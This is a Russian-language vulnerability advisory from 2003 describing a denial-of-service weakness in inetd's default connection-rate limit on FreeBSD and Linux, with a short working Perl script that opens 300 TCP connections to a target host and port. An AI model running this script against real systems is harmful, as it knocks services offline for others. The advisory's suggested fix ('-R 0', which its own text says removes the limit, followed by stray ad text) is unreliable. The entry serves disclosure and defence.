Дата публикации: | 07.09.2003 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1463 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: InetD (Internet Services Daemon) Описание: Уязвимость обнаружена в Internet Services Daemon. В конфигурации по умолчанию на большинстве FreeBSD/linux инсталляций, удаленный пользователь может завесить работу службы, используя уязвимость, обнаруженную более 11 лет назад. InetD использует опцию: -R rateКоторая определяет максимальное число подключений с одного хоста в течение минуты. Значение по умолчанию – 256. Значение 0 означает, что число подключений неограниченно. Атакующий, способный установить более 256 подключений в течение минуты (зависит от его пропускной способности), может нарушить работу службы в течение следующих 10 минут. Если атакующий завершит подключение перед восстановлением работы службы, то его нападение не будет зарегистрировано. Пример/Эксплоит: #!/usr/bin/perl use Socket; $host=@ARGV[0]; $port=@ARGV[1]; if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";} $iadr=inet_aton($host); $padr=sockaddr_in($port,$iadr); for($i=0; $i < 300; $i++) { socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp")); connect(SOCK,$padr) or next; close(SOCK); } print "\nDone\n"; Решение: Добавте следующую строку в inetd.conf файл:-R 0 -s your_ad_can_be_here |
|
Ссылки: | 11 years of inetd default insecurity? |